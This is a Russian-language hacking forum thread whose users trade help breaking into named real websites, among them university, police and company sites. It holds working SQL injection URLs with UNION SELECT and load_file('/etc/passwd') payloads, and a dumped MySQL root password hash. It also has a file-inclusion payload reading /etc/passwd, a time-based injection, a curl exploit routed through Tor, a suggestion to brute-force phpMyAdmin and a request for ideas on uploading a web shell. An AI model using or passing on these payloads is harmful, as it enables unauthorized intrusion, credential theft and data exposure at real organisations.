Как отфильтровать сайты в burpsuite? отображать только домен и его поддомены не зависимо от https/http http://joxi.ru/GrqMLEyHQN0GLr
http://gwps.org/36.0.html?&action=showDetails&showid=72 Как раскрутить? как слепая тоже не крутиться( Таблица be_users колонка usename Немогу данные выковырять
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись 1 - PHP: http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+- 2- PHP: http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+- как прочитать файл
1 http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+ или http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+ где 0x2F6574632F706173737764= hex(/etc/passwd) 2 нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+ root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B всё там нормально
Спасибо кто откликнулся. В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/ в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
Всем привет! На странице есть ckeditor с возможностью загружать файлы на сервер. - заливать можно всё - имена файлов переименовывается, так что залить .htaccess не получится - имена после заливки известны - php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются - shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется) Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей. Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен. Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует. И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php есть phpmyadmin можно попробывать пробрутить версия http://lidodo.astro.ncu.edu.tw/phpMyAdmin//doc/html/index.html
Неужели ты эту уязвимость раскрутил http://icfi.ulim.md/alltopics.php?cat=sleep(12) Поищи тут может найдёшь, я думаю она где-то спрятана ftp.ulim.md moodle.ulim.md git.ulim.md gw.ulim.md domain.ulim.md files.ulim.md redmine.ulim.md s.ulim.md vm.ulim.md
Здравствуйте дорогие. Прошу вас показать щеглу как надо кутить скульки http://www.caresoft.ind.in/info.php?show=185 http://lidodo.astro.ncu.edu.tw/2015...rt.base64-encode/resource=../../../etc/passwd исходный код можем читать Спасибо.
Code: curl -s -k --proxy socks5://127.0.0.1:9150 -A 'mozilla' 'http://www.caresoft.ind.in/info.php' --data 'show=185+union+select+1,2,3,4,concat(999,char(58),version()),6,7+--+s' | grep 999 <td width="100%" class="text">999:5.1.68-community</td>
